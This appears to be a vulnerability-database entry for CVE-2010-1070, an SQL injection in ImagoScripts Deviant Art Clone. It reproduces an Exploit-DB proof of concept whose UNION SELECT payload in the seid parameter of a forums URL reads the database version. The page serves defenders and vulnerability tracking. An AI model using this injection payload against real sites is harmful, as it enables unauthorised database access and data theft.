CVE-2010-1070
Description
SQL injection vulnerability in index.php in ImagoScripts Deviant Art Clone allows remote attackers to execute arbitrary SQL commands via the seid parameter in a forums viewcat action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ImagoScripts Deviant Art Clone - SQL Injection
Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| imagoscripts | deviant_art_clone | | |
References
- http://osvdb.org/61482
- http://packetstormsecurity.org/1001-exploits/imagoscriptsdac-sql.txt
- http://secunia.com/advisories/38096
- http://www.exploit-db.com/exploits/11002
- http://www.vupen.com/english/advisories/2010/0031
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55379
- http://osvdb.org/61482
- http://packetstormsecurity.org/1001-exploits/imagoscriptsdac-sql.txt
- http://secunia.com/advisories/38096
- http://www.exploit-db.com/exploits/11002
- http://www.vupen.com/english/advisories/2010/0031
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55379
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.